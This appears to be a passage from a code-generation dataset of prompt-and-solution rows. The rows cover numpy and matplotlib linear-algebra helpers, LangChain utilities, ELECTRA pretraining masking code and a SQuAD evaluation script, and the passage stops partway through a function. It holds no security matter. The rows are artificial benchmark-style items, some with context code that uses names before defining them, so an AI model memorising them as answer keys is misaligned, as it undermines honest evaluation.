import plotly.express as px
import pandas as pd
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
"""Returns a LaTeX bmatrix
:a: numpy array
:returns: LaTeX bmatrix as a string
"""
if len(a.shape) > 2:
raise ValueError('bmatrix can at most display two dimensions')
lines = str(a).replace('[', '').replace(']', '').splitlines()
rv = [r'\begin{bmatrix}']
rv += [' ' + ' & '.join(l.split()) + r'\\' for l in lines]
rv += [r'\end{bmatrix}']
return '\n'.join(rv) | Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string |
6,154 | import numpy as np
import matplotlib.pyplot as plt
def visualize(X_circle,X_vec,title_txt):
fig, ax = plt.subplots()
plt.plot(X_circle[0,:], X_circle[1,:],'k',
linestyle = '--',
linewidth = 0.5)
plt.quiver(0,0,X_vec[0,0],X_vec[1,0],
angles='xy', scale_units='xy',scale=1,
color = [0, 0.4392, 0.7529])
plt.quiver(0,0,X_vec[0,1],X_vec[1,1],
angles='xy', scale_units='xy',scale=1,
color = [1,0,0])
plt.axvline(x=0, color= 'k', zorder=0)
plt.axhline(y=0, color= 'k', zorder=0)
plt.ylabel('$x_2$')
plt.xlabel('$x_1$')
ax.set_aspect(1)
ax.set_xlim([-2.5, 2.5])
ax.set_ylim([-2.5, 2.5])
ax.grid(linestyle='--', linewidth=0.25, color=[0.5,0.5,0.5])
ax.set_xticks(np.linspace(-2,2,5));
ax.set_yticks(np.linspace(-2,2,5));
plt.title(title_txt)
plt.show() | null |
6,155 | import plotly.graph_objects as go
import streamlit as st
import numpy as np
import plotly.express as px
import pandas as pd
import sympy
from sympy import *
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
"""Returns a LaTeX bmatrix
:a: numpy array
:returns: LaTeX bmatrix as a string
"""
if len(a.shape) > 2:
raise ValueError('bmatrix can at most display two dimensions')
lines = str(a).replace('[', '').replace(']', '').splitlines()
rv = [r'\begin{bmatrix}']
rv += [' ' + ' & '.join(l.split()) + r'\\' for l in lines]
rv += [r'\end{bmatrix}']
return '\n'.join(rv) | Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string |
6,156 | import sympy
import numpy as np
import matplotlib.pyplot as plt
from numpy import linalg as L
xx1, xx2 = mesh_circ(0, 0, 1, 50)
def mesh_circ(c1, c2, r, num):
theta = np.linspace(0, 2*np.pi, num)
r = np.linspace(0,r, num)
theta,r = np.meshgrid(theta,r)
xx1 = np.cos(theta)*r + c1
xx2 = np.sin(theta)*r + c2
return xx1, xx2 | null |
6,158 | import sympy
from sympy import Matrix, Transpose
import numpy as np
from sympy.functions import exp
import matplotlib.pyplot as plt
xx1, xx2 = mesh_circ(0, 0, 3, 20)
def mesh_circ(c1, c2, r, num):
theta = np.arange(0,2*np.pi+np.pi/num,np.pi/num)
r = np.arange(0,r,r/num)
theta,r = np.meshgrid(theta,r)
xx1 = np.cos(theta)*r + c1
xx2 = np.sin(theta)*r + c2
return xx1, xx2 | null |
6,159 | import numpy as np
import matplotlib.pyplot as plt
def visualize(X_circle,X_vec,title_txt):
fig, ax = plt.subplots()
plt.plot(X_circle[:,0], X_circle[:,1],'k',
linestyle = '--',
linewidth = 0.5)
plt.quiver(0,0,X_vec[0,0],X_vec[0,1],
angles='xy', scale_units='xy',scale=1,
color = [0, 0.4392, 0.7529])
plt.quiver(0,0,X_vec[1,0],X_vec[1,1],
angles='xy', scale_units='xy',scale=1,
color = [1,0,0])
plt.axvline(x=0, color= 'k', zorder=0)
plt.axhline(y=0, color= 'k', zorder=0)
plt.ylabel('$x_2$')
plt.xlabel('$x_1$')
ax.set_aspect(1)
ax.set_xlim([-2.5, 2.5])
ax.set_ylim([-2.5, 2.5])
ax.grid(linestyle='--', linewidth=0.25, color=[0.5,0.5,0.5])
ax.set_xticks(np.linspace(-2,2,5));
ax.set_yticks(np.linspace(-2,2,5));
plt.title(title_txt)
plt.show() | null |
6,160 | import numpy as np
from matplotlib import pyplot as plt
plt.rcParams['image.cmap'] = 'RdBu_r'
import seaborn as sns
def svd(X):
full_matrices = True
U, s, Vt = np.linalg.svd(X,full_matrices = full_matrices)
# Put the vector singular values into a padded matrix
if full_matrices:
S = np.zeros(X.shape)
np.fill_diagonal(S, s)
else:
S = np.diag(s)
# Rounding for display
return np.round(U, PRECISION), np.round(S, PRECISION), np.round(Vt.T, PRECISION)
np.random.seed(1)
all_max = 6
all_min = -6
fig, axs = plt.subplots(1, 3, figsize=(12, 3))
plt.sca(axs[0])
ax = sns.heatmap(U,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title('$U$')
plt.sca(axs[1])
ax = sns.heatmap(U.T,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title('$U^T$')
plt.sca(axs[2])
ax = sns.heatmap(U@U.T,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title('$I$')
all_max = 6
all_min = -6
fig, axs = plt.subplots(1, 3, figsize=(12, 3))
plt.sca(axs[0])
ax = sns.heatmap(V,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title('$V$')
plt.sca(axs[1])
ax = sns.heatmap(V.T,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title('$V^T$')
plt.sca(axs[2])
ax = sns.heatmap(V@V.T,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title('$I$')
fig, axs = plt.subplots(1, 4, figsize=(12, 3))
def visualize_svd(X,title_X,title_U,title_S,title_V, fig_height=5):
# Run SVD, as defined above
U, S, V = svd(X)
all_ = np.r_[X.flatten(order='C'),U.flatten(order='C'),
S.flatten(order='C'),V.flatten(order='C')]
# all_max = max(all_.max(),all_.min())
# all_min = -max(all_.max(),all_.min())
all_max = 6
all_min = -6
# Visualization
fig, axs = plt.subplots(1, 7, figsize=(12, fig_height))
plt.sca(axs[0])
ax = sns.heatmap(X,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title(title_X)
plt.sca(axs[1])
plt.title('@')
plt.axis('off')
plt.sca(axs[2])
ax = sns.heatmap(U,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title(title_U)
plt.sca(axs[3])
plt.title('@')
plt.axis('off')
plt.sca(axs[4])
ax = sns.heatmap(S,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title(title_S)
plt.sca(axs[5])
plt.title('@')
plt.axis('off')
plt.sca(axs[6])
ax = sns.heatmap(V.T,cmap='RdBu_r',vmax = all_max,vmin = all_min,
cbar_kws={"orientation": "horizontal"})
ax.set_aspect("equal")
plt.title(title_V)
return X, U, S, V | null |
6,161 | import plotly.graph_objects as go
import streamlit as st
import numpy as np
import plotly.express as px
import pandas as pd
import sympy
from scipy.spatial import distance
def fcn_Minkowski(xx, yy, mu, p = 2, Chebychev = False):
if Chebychev:
zz = np.maximum(np.abs(xx - mu[0]),np.abs(yy - mu[1]))
else:
zz = ((np.abs((xx - mu[0]))**p) + (np.abs((yy - mu[1]))**p))**(1./p)
return zz | null |
6,162 | import plotly.graph_objects as go
import streamlit as st
import numpy as np
import plotly.express as px
import pandas as pd
import sympy
from scipy.spatial import distance
def fcn_mahal(xx, yy, mu, Sigma, standardized = False):
if standardized:
D = np.diag(np.diag(Sigma))
Sigma_inv = np.linalg.inv(D)
else:
Sigma_inv = np.linalg.inv(Sigma)
xy_ = np.stack((xx.flatten(), yy.flatten())).T
zz = np.diag(np.sqrt(np.dot(np.dot((xy_-mu),Sigma_inv),(xy_-mu).T)))
zz = np.reshape(zz,xx.shape)
return zz | null |
6,163 | import streamlit as st
import plotly.graph_objects as go
import sympy
import numpy as np
The provided code snippet includes necessary dependencies for implementing the `bmatrix` function. Write a Python function `def bmatrix(a)` to solve the following problem:
Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string
Here is the function:
def bmatrix(a):
"""Returns a LaTeX bmatrix
:a: numpy array
:returns: LaTeX bmatrix as a string
"""
if len(a.shape) > 2:
raise ValueError('bmatrix can at most display two dimensions')
lines = str(a).replace('[', '').replace(']', '').splitlines()
rv = [r'\begin{bmatrix}']
rv += [' ' + ' & '.join(l.split()) + r'\\' for l in lines]
rv += [r'\end{bmatrix}']
return '\n'.join(rv) | Returns a LaTeX bmatrix :a: numpy array :returns: LaTeX bmatrix as a string |
6,164 | import sympy
import numpy as np
import matplotlib.pyplot as plt
xx1, xx2 = mesh_circ(0, 0, 4, 20)
def mesh_circ(c1, c2, r, num):
theta = np.arange(0,2*np.pi+np.pi/num,np.pi/num)
r = np.arange(0,r,r/num)
theta,r = np.meshgrid(theta,r)
xx1 = np.cos(theta)*r + c1
xx2 = np.sin(theta)*r + c2
return xx1, xx2 | null |
6,165 | import numpy as np
def is_pos_def(A):
if np.array_equal(A, A.T):
try:
np.linalg.cholesky(A)
return True
except np.linalg.LinAlgError:
return False
else:
return False | null |
6,166 | import numpy as np
from matplotlib import pyplot as plt
import seaborn as sns
PRECISION = 3
np.random.seed(1)
U, S, V = svd(X, full_matrices = True)
U, S, V = svd(X, full_matrices = False)
import copy
def svd(X,full_matrices):
U, s, Vt = np.linalg.svd(X,full_matrices = full_matrices)
# Put the vector singular values into a padded matrix
if full_matrices:
S = np.zeros(X.shape)
np.fill_diagonal(S, s)
else:
S = np.diag(s)
# Rounding for display
return np.round(U, PRECISION), np.round(S, PRECISION), np.round(Vt.T, PRECISION) | null |
6,167 | from typing import Dict, List, Any, Union, Optional
from langchain import PromptTemplate, LLMChain
from langchain.schema import LLMResult, BaseOutputParser, Generation
from langchain.llms import OpenAI, BaseLLM
from langchain.prompts.few_shot import FewShotPromptTemplate
from langchain.chat_models import ChatOpenAI
def format_options(options: List[str]) -> str:
return "\n".join(options) | null |
6,168 | import sys
from io import StringIO
from typing import List, Optional, Dict, Tuple
from langchain.schema import LLMResult, BaseOutputParser
from pydantic.fields import Field
from pydantic.main import BaseModel
def get_n_tokens(input: str, model_name: str = 'gpt-3.5-turbo'):
import tiktoken
enc = tiktoken.encoding_for_model(model_name)
res = enc.encode(input)
return len(res)
def fit_context(text_elememts: List[str], max_tokens: int):
results = []
total_tokens = 0
for element in text_elememts:
total_tokens += get_n_tokens(element)
if total_tokens <= max_tokens:
results.append(element)
else:
break
return results | null |
6,169 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import tokenization
from pretrain import pretrain_data
The provided code snippet includes necessary dependencies for implementing the `gather_positions` function. Write a Python function `def gather_positions(sequence, positions)` to solve the following problem:
Gathers the vectors at the specific positions over a minibatch. Args: sequence: A [batch_size, seq_length] or [batch_size, seq_length, depth] tensor of values positions: A [batch_size, n_positions] tensor of indices Returns: A [batch_size, n_positions] or [batch_size, n_positions, depth] tensor of the values at the indices
Here is the function:
def gather_positions(sequence, positions):
"""Gathers the vectors at the specific positions over a minibatch.
Args:
sequence: A [batch_size, seq_length] or
[batch_size, seq_length, depth] tensor of values
positions: A [batch_size, n_positions] tensor of indices
Returns: A [batch_size, n_positions] or
[batch_size, n_positions, depth] tensor of the values at the indices
"""
shape = modeling.get_shape_list(sequence, expected_rank=[2, 3])
depth_dimension = (len(shape) == 3)
if depth_dimension:
B, L, D = shape
else:
B, L = shape
D = 1
sequence = tf.expand_dims(sequence, -1)
position_shift = tf.expand_dims(L * tf.range(B), -1)
flat_positions = tf.reshape(positions + position_shift, [-1])
flat_sequence = tf.reshape(sequence, [B * L, D])
gathered = tf.gather(flat_sequence, flat_positions)
if depth_dimension:
return tf.reshape(gathered, [B, -1, D])
else:
return tf.reshape(gathered, [B, -1]) | Gathers the vectors at the specific positions over a minibatch. Args: sequence: A [batch_size, seq_length] or [batch_size, seq_length, depth] tensor of values positions: A [batch_size, n_positions] tensor of indices Returns: A [batch_size, n_positions] or [batch_size, n_positions, depth] tensor of the values at the indices |
6,170 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import tokenization
from pretrain import pretrain_data
def scatter_update(sequence, updates, positions):
"""Scatter-update a sequence.
Args:
sequence: A [batch_size, seq_len] or [batch_size, seq_len, depth] tensor
updates: A tensor of size batch_size*seq_len(*depth)
positions: A [batch_size, n_positions] tensor
Returns: A tuple of two tensors. First is a [batch_size, seq_len] or
[batch_size, seq_len, depth] tensor of "sequence" with elements at
"positions" replaced by the values at "updates." Updates to index 0 are
ignored. If there are duplicated positions the update is only applied once.
Second is a [batch_size, seq_len] mask tensor of which inputs were updated.
"""
shape = modeling.get_shape_list(sequence, expected_rank=[2, 3])
depth_dimension = (len(shape) == 3)
if depth_dimension:
B, L, D = shape
else:
B, L = shape
D = 1
sequence = tf.expand_dims(sequence, -1)
N = modeling.get_shape_list(positions)[1]
shift = tf.expand_dims(L * tf.range(B), -1)
flat_positions = tf.reshape(positions + shift, [-1, 1])
flat_updates = tf.reshape(updates, [-1, D])
updates = tf.scatter_nd(flat_positions, flat_updates, [B * L, D])
updates = tf.reshape(updates, [B, L, D])
flat_updates_mask = tf.ones([B * N], tf.int32)
updates_mask = tf.scatter_nd(flat_positions, flat_updates_mask, [B * L])
updates_mask = tf.reshape(updates_mask, [B, L])
not_first_token = tf.concat([tf.zeros((B, 1), tf.int32),
tf.ones((B, L - 1), tf.int32)], -1)
updates_mask *= not_first_token
updates_mask_3d = tf.expand_dims(updates_mask, -1)
# account for duplicate positions
if sequence.dtype == tf.float32:
updates_mask_3d = tf.cast(updates_mask_3d, tf.float32)
updates /= tf.maximum(1.0, updates_mask_3d)
else:
assert sequence.dtype == tf.int32
updates = tf.math.floordiv(updates, tf.maximum(1, updates_mask_3d))
updates_mask = tf.minimum(updates_mask, 1)
updates_mask_3d = tf.minimum(updates_mask_3d, 1)
updated_sequence = (((1 - updates_mask_3d) * sequence) +
(updates_mask_3d * updates))
if not depth_dimension:
updated_sequence = tf.squeeze(updated_sequence, -1)
return updated_sequence, updates_mask
def _get_candidates_mask(inputs: pretrain_data.Inputs, vocab,
disallow_from_mask=None):
"""Returns a mask tensor of positions in the input that can be masked out."""
ignore_ids = [vocab["[SEP]"], vocab["[CLS]"], vocab["[MASK]"]]
candidates_mask = tf.ones_like(inputs.input_ids, tf.bool)
for ignore_id in ignore_ids:
candidates_mask &= tf.not_equal(inputs.input_ids, ignore_id)
candidates_mask &= tf.cast(inputs.input_mask, tf.bool)
if disallow_from_mask is not None:
candidates_mask &= ~disallow_from_mask
return candidates_mask
The provided code snippet includes necessary dependencies for implementing the `mask` function. Write a Python function `def mask(config: configure_pretraining.PretrainingConfig, inputs: pretrain_data.Inputs, mask_prob, proposal_distribution=1.0, disallow_from_mask=None, already_masked=None)` to solve the following problem:
Implementation of dynamic masking. The optional arguments aren't needed for BERT/ELECTRA and are from early experiments in "strategically" masking out tokens instead of uniformly at random. Args: config: configure_pretraining.PretrainingConfig inputs: pretrain_data.Inputs containing input input_ids/input_mask mask_prob: percent of tokens to mask proposal_distribution: for non-uniform masking can be a [B, L] tensor of scores for masking each position. disallow_from_mask: a boolean tensor of [B, L] of positions that should not be masked out already_masked: a boolean tensor of [B, N] of already masked-out tokens for multiple rounds of masking Returns: a pretrain_data.Inputs with masking added
Here is the function:
def mask(config: configure_pretraining.PretrainingConfig,
inputs: pretrain_data.Inputs, mask_prob, proposal_distribution=1.0,
disallow_from_mask=None, already_masked=None):
"""Implementation of dynamic masking. The optional arguments aren't needed for
BERT/ELECTRA and are from early experiments in "strategically" masking out
tokens instead of uniformly at random.
Args:
config: configure_pretraining.PretrainingConfig
inputs: pretrain_data.Inputs containing input input_ids/input_mask
mask_prob: percent of tokens to mask
proposal_distribution: for non-uniform masking can be a [B, L] tensor
of scores for masking each position.
disallow_from_mask: a boolean tensor of [B, L] of positions that should
not be masked out
already_masked: a boolean tensor of [B, N] of already masked-out tokens
for multiple rounds of masking
Returns: a pretrain_data.Inputs with masking added
"""
# Get the batch size, sequence length, and max masked-out tokens
N = config.max_predictions_per_seq
B, L = modeling.get_shape_list(inputs.input_ids)
# Find indices where masking out a token is allowed
vocab = tokenization.FullTokenizer(
config.vocab_file, do_lower_case=config.do_lower_case).vocab
candidates_mask = _get_candidates_mask(inputs, vocab, disallow_from_mask)
# Set the number of tokens to mask out per example
num_tokens = tf.cast(tf.reduce_sum(inputs.input_mask, -1), tf.float32)
num_to_predict = tf.maximum(1, tf.minimum(
N, tf.cast(tf.round(num_tokens * mask_prob), tf.int32)))
masked_lm_weights = tf.cast(tf.sequence_mask(num_to_predict, N), tf.float32)
if already_masked is not None:
masked_lm_weights *= (1 - already_masked)
# Get a probability of masking each position in the sequence
candidate_mask_float = tf.cast(candidates_mask, tf.float32)
sample_prob = (proposal_distribution * candidate_mask_float)
sample_prob /= tf.reduce_sum(sample_prob, axis=-1, keepdims=True)
# Sample the positions to mask out
sample_prob = tf.stop_gradient(sample_prob)
sample_logits = tf.log(sample_prob)
masked_lm_positions = tf.random.categorical(
sample_logits, N, dtype=tf.int32)
masked_lm_positions *= tf.cast(masked_lm_weights, tf.int32)
# Get the ids of the masked-out tokens
shift = tf.expand_dims(L * tf.range(B), -1)
flat_positions = tf.reshape(masked_lm_positions + shift, [-1, 1])
masked_lm_ids = tf.gather_nd(tf.reshape(inputs.input_ids, [-1]),
flat_positions)
masked_lm_ids = tf.reshape(masked_lm_ids, [B, -1])
masked_lm_ids *= tf.cast(masked_lm_weights, tf.int32)
# Update the input ids
replace_with_mask_positions = masked_lm_positions * tf.cast(
tf.less(tf.random.uniform([B, N]), 0.85), tf.int32)
inputs_ids, _ = scatter_update(
inputs.input_ids, tf.fill([B, N], vocab["[MASK]"]),
replace_with_mask_positions)
return pretrain_data.get_updated_inputs(
inputs,
input_ids=tf.stop_gradient(inputs_ids),
masked_lm_positions=masked_lm_positions,
masked_lm_ids=masked_lm_ids,
masked_lm_weights=masked_lm_weights
) | Implementation of dynamic masking. The optional arguments aren't needed for BERT/ELECTRA and are from early experiments in "strategically" masking out tokens instead of uniformly at random. Args: config: configure_pretraining.PretrainingConfig inputs: pretrain_data.Inputs containing input input_ids/input_mask mask_prob: percent of tokens to mask proposal_distribution: for non-uniform masking can be a [B, L] tensor of scores for masking each position. disallow_from_mask: a boolean tensor of [B, L] of positions that should not be masked out already_masked: a boolean tensor of [B, N] of already masked-out tokens for multiple rounds of masking Returns: a pretrain_data.Inputs with masking added |
6,171 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import tokenization
from pretrain import pretrain_data
def scatter_update(sequence, updates, positions):
"""Scatter-update a sequence.
Args:
sequence: A [batch_size, seq_len] or [batch_size, seq_len, depth] tensor
updates: A tensor of size batch_size*seq_len(*depth)
positions: A [batch_size, n_positions] tensor
Returns: A tuple of two tensors. First is a [batch_size, seq_len] or
[batch_size, seq_len, depth] tensor of "sequence" with elements at
"positions" replaced by the values at "updates." Updates to index 0 are
ignored. If there are duplicated positions the update is only applied once.
Second is a [batch_size, seq_len] mask tensor of which inputs were updated.
"""
shape = modeling.get_shape_list(sequence, expected_rank=[2, 3])
depth_dimension = (len(shape) == 3)
if depth_dimension:
B, L, D = shape
else:
B, L = shape
D = 1
sequence = tf.expand_dims(sequence, -1)
N = modeling.get_shape_list(positions)[1]
shift = tf.expand_dims(L * tf.range(B), -1)
flat_positions = tf.reshape(positions + shift, [-1, 1])
flat_updates = tf.reshape(updates, [-1, D])
updates = tf.scatter_nd(flat_positions, flat_updates, [B * L, D])
updates = tf.reshape(updates, [B, L, D])
flat_updates_mask = tf.ones([B * N], tf.int32)
updates_mask = tf.scatter_nd(flat_positions, flat_updates_mask, [B * L])
updates_mask = tf.reshape(updates_mask, [B, L])
not_first_token = tf.concat([tf.zeros((B, 1), tf.int32),
tf.ones((B, L - 1), tf.int32)], -1)
updates_mask *= not_first_token
updates_mask_3d = tf.expand_dims(updates_mask, -1)
# account for duplicate positions
if sequence.dtype == tf.float32:
updates_mask_3d = tf.cast(updates_mask_3d, tf.float32)
updates /= tf.maximum(1.0, updates_mask_3d)
else:
assert sequence.dtype == tf.int32
updates = tf.math.floordiv(updates, tf.maximum(1, updates_mask_3d))
updates_mask = tf.minimum(updates_mask, 1)
updates_mask_3d = tf.minimum(updates_mask_3d, 1)
updated_sequence = (((1 - updates_mask_3d) * sequence) +
(updates_mask_3d * updates))
if not depth_dimension:
updated_sequence = tf.squeeze(updated_sequence, -1)
return updated_sequence, updates_mask
def unmask(inputs: pretrain_data.Inputs):
unmasked_input_ids, _ = scatter_update(
inputs.input_ids, inputs.masked_lm_ids, inputs.masked_lm_positions)
return pretrain_data.get_updated_inputs(inputs, input_ids=unmasked_input_ids) | null |
6,172 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import tokenization
from pretrain import pretrain_data
def sample_from_softmax(logits, disallow=None):
if disallow is not None:
logits -= 1000.0 * disallow
uniform_noise = tf.random.uniform(
modeling.get_shape_list(logits), minval=0, maxval=1)
gumbel_noise = -tf.log(-tf.log(uniform_noise + 1e-9) + 1e-9)
return tf.one_hot(tf.argmax(tf.nn.softmax(logits + gumbel_noise), -1,
output_type=tf.int32), logits.shape[-1]) | null |
6,173 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import tokenization
from util import utils
Inputs = collections.namedtuple(
"Inputs", ["input_ids", "input_mask", "segment_ids", "masked_lm_positions",
"masked_lm_ids", "masked_lm_weights"])
ENDC = "\033[0m"
RED = COLORS[0]
The provided code snippet includes necessary dependencies for implementing the `print_tokens` function. Write a Python function `def print_tokens(inputs: Inputs, inv_vocab, updates_mask=None)` to solve the following problem:
Pretty-print model inputs.
Here is the function:
def print_tokens(inputs: Inputs, inv_vocab, updates_mask=None):
"""Pretty-print model inputs."""
pos_to_tokid = {}
for tokid, pos, weight in zip(
inputs.masked_lm_ids[0], inputs.masked_lm_positions[0],
inputs.masked_lm_weights[0]):
if weight == 0:
pass
else:
pos_to_tokid[pos] = tokid
text = ""
provided_update_mask = (updates_mask is not None)
if not provided_update_mask:
updates_mask = np.zeros_like(inputs.input_ids)
for pos, (tokid, um) in enumerate(
zip(inputs.input_ids[0], updates_mask[0])):
token = inv_vocab[tokid]
if token == "[PAD]":
break
if pos in pos_to_tokid:
token = RED + token + " (" + inv_vocab[pos_to_tokid[pos]] + ")" + ENDC
if provided_update_mask:
assert um == 1
else:
if provided_update_mask:
assert um == 0
text += token + " "
utils.log(tokenization.printable_text(text)) | Pretty-print model inputs. |
6,174 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
The provided code snippet includes necessary dependencies for implementing the `get_span_labels` function. Write a Python function `def get_span_labels(sentence_tags, inv_label_mapping=None)` to solve the following problem:
Go from token-level labels to list of entities (start, end, class).
Here is the function:
def get_span_labels(sentence_tags, inv_label_mapping=None):
"""Go from token-level labels to list of entities (start, end, class)."""
if inv_label_mapping:
sentence_tags = [inv_label_mapping[i] for i in sentence_tags]
span_labels = []
last = 'O'
start = -1
for i, tag in enumerate(sentence_tags):
pos, _ = (None, 'O') if tag == 'O' else tag.split('-')
if (pos == 'S' or pos == 'B' or tag == 'O') and last != 'O':
span_labels.append((start, i - 1, last.split('-')[-1]))
if pos == 'B' or pos == 'S' or last == 'O':
start = i
last = tag
if sentence_tags[-1] != 'O':
span_labels.append((start, len(sentence_tags) - 1,
sentence_tags[-1].split('-')[-1]))
return span_labels | Go from token-level labels to list of entities (start, end, class). |
6,175 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
The provided code snippet includes necessary dependencies for implementing the `get_tags` function. Write a Python function `def get_tags(span_labels, length, encoding)` to solve the following problem:
Converts a list of entities to token-label labels based on the provided encoding (e.g., BIOES).
Here is the function:
def get_tags(span_labels, length, encoding):
"""Converts a list of entities to token-label labels based on the provided
encoding (e.g., BIOES).
"""
tags = ['O' for _ in range(length)]
for s, e, t in span_labels:
for i in range(s, e + 1):
tags[i] = 'I-' + t
if 'E' in encoding:
tags[e] = 'E-' + t
if 'B' in encoding:
tags[s] = 'B-' + t
if 'S' in encoding and s - e == 0:
tags[s] = 'S-' + t
return tags | Converts a list of entities to token-label labels based on the provided encoding (e.g., BIOES). |
6,176 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import os
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import feature_spec
from finetune import task
from finetune.tagging import tagging_metrics
from finetune.tagging import tagging_utils
from model import tokenization
from pretrain import pretrain_helpers
from util import utils
The provided code snippet includes necessary dependencies for implementing the `tokenize_and_align` function. Write a Python function `def tokenize_and_align(tokenizer, words, cased=False)` to solve the following problem:
Splits up words into subword-level tokens.
Here is the function:
def tokenize_and_align(tokenizer, words, cased=False):
"""Splits up words into subword-level tokens."""
words = ["[CLS]"] + list(words) + ["[SEP]"]
basic_tokenizer = tokenizer.basic_tokenizer
tokenized_words = []
for word in words:
word = tokenization.convert_to_unicode(word)
word = basic_tokenizer._clean_text(word)
if word == "[CLS]" or word == "[SEP]":
word_toks = [word]
else:
if not cased:
word = word.lower()
word = basic_tokenizer._run_strip_accents(word)
word_toks = basic_tokenizer._run_split_on_punc(word)
tokenized_word = []
for word_tok in word_toks:
tokenized_word += tokenizer.wordpiece_tokenizer.tokenize(word_tok)
tokenized_words.append(tokenized_word)
assert len(tokenized_words) == len(words)
return tokenized_words | Splits up words into subword-level tokens. |
6,177 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def parse_args():
parser = argparse.ArgumentParser('Official evaluation script for SQuAD version 2.0.')
parser.add_argument('data_file', metavar='data.json', help='Input data JSON file.')
parser.add_argument('pred_file', metavar='pred.json', help='Model predictions.')
parser.add_argument('--out-file', '-o', metavar='eval.json',
help='Write accuracy metrics to file (default is stdout).')
parser.add_argument('--na-prob-file', '-n', metavar='na_prob.json',
help='Model estimates of probability of no answer.')
parser.add_argument('--na-prob-thresh', '-t', type=float, default=1.0,
help='Predict "" if no-answer probability exceeds this (default = 1.0).')
parser.add_argument('--out-image-dir', '-p', metavar='out_images', default=None,
help='Save precision-recall curves to directory.')
parser.add_argument('--verbose', '-v', action='store_true')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args() | null |
6,178 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
OPTS = None
def set_opts(config: configure_finetuning.FinetuningConfig, split):
global OPTS
Options = collections.namedtuple("Options", [
"data_file", "pred_file", "out_file", "na_prob_file", "na_prob_thresh",
"out_image_dir", "verbose"])
OPTS = Options(
data_file=os.path.join(
config.raw_data_dir("squad"),
split + ("-debug" if config.debug else "") + ".json"),
pred_file=config.qa_preds_file("squad"),
out_file=config.qa_eval_file("squad"),
na_prob_file=config.qa_na_file("squad"),
na_prob_thresh=config.qa_na_threshold,
out_image_dir=None,
verbose=False
) | null |
6,179 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def make_qid_to_has_ans(dataset):
qid_to_has_ans = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
qid_to_has_ans[qa['id']] = bool(qa['answers'])
return qid_to_has_ans | null |
6,180 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
regex = re.compile(r'\b(a|an|the)\b', re.UNICODE)
return re.sub(regex, ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def compute_exact(a_gold, a_pred):
return int(normalize_answer(a_gold) == normalize_answer(a_pred))
def compute_f1(a_gold, a_pred):
gold_toks = get_tokens(a_gold)
pred_toks = get_tokens(a_pred)
common = collections.Counter(gold_toks) & collections.Counter(pred_toks)
num_same = sum(common.values())
if len(gold_toks) == 0 or len(pred_toks) == 0:
# If either is no-answer, then F1 is 1 if they agree, 0 otherwise
return int(gold_toks == pred_toks)
if num_same == 0:
return 0
precision = 1.0 * num_same / len(pred_toks)
recall = 1.0 * num_same / len(gold_toks)
f1 = (2 * precision * recall) / (precision + recall)
return f1
def get_raw_scores(dataset, preds):
exact_scores = {}
f1_scores = {}
for article in dataset:
for p in article['paragraphs']:
for qa in p['qas']:
